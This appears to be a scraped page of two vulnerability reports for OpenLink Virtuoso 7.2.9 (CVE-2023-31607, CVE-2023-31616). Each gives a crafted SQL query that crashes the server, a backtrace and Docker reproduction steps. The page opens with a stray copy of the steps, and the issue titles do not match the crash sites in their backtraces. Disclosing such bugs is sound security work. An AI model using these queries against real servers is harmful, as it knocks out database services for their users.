docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31607: virtuoso 7.2.9 crashed at __libc_malloc · Issue #1120 · openlink/virtuoso-opensource

An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

SELECT MOD(\-9223372036854775808, \-1);

backtrace:

#0 0x66a32e (bif\_mod+0xce)
#1 0x74ae62 (sqlr\_run\_bif\_in\_sandbox+0x392)
#2 0x79b598 (sqlp\_patch\_call\_if\_special\_or\_optimizable+0x1148)
#3 0xccffe7 (scn3yyparse+0xc5d7)
#4 0x6b995b (sql\_compile\_1+0x129b)
#5 0x7c8cd0 (stmt\_set\_query+0x340)
#6 0x7cabc2 (sf\_sql\_execute+0x922)
#7 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#8 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#9 0xe1f01c (future\_wrapper+0x3fc)
#10 0xe2691e (\_thread\_boot+0x11e)
#11 0x7f1cfacc6609 (start\_thread+0xd9)
#12 0x7f1cfaa96133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31616: virtuoso 7.2.9 crashed at bif_mod · Issue #1122 · openlink/virtuoso-opensource

An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE b (
      folders VARCHAR(80),
      folderid VARCHAR(80),
      parentid VARCHAR(80),
      rootid VARCHAR(80),
      c INTEGER,
      path VARCHAR(80),
      id VARCHAR(80),
      i VARCHAR(80),
      d VARCHAR(80),
      e VARCHAR(80),
      f VARCHAR(80)
    );
SELECT case b.d when coalesce((select max(17+coalesce((select max(coalesce((select (select count(distinct case f when 19 then coalesce((select coalesce((select max(11\-(abs(d)/abs(11))) from b where not  \-c in (19,b.d,17)),17) from b where (f in (d,f,b.c))),d) else d end) from b) from b where 17 between e and b.f),b.c)) from b where 13\>=e),d)) from b where b.f\>b.f),b.d) then 17 else b.f end FROM b WHERE not exists(select 1 from b where 13 between c+17 and (b.id));

backtrace:

#0 0x739343 (dfe\_unit\_col\_loci+0x1393)
#1 0x739030 (dfe\_unit\_col\_loci+0x1080)
#2 0x747e8c (sqlg\_top\_1+0x7c)
#3 0x70d4d4 (sqlo\_top\_select+0x164)
#4 0x6b72bf (sql\_stmt\_comp+0x8bf)
#5 0x6ba122 (sql\_compile\_1+0x1a62)
#6 0x7c8cd0 (stmt\_set\_query+0x340)
#7 0x7cabc2 (sf\_sql\_execute+0x922)
#8 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#9 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#10 0xe1f01c (future\_wrapper+0x3fc)
#11 0xe2691e (\_thread\_boot+0x11e)
#12 0x7fb2a20b9609 (start\_thread+0xd9)
#13 0x7fb2a1e89133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

Tag

#docker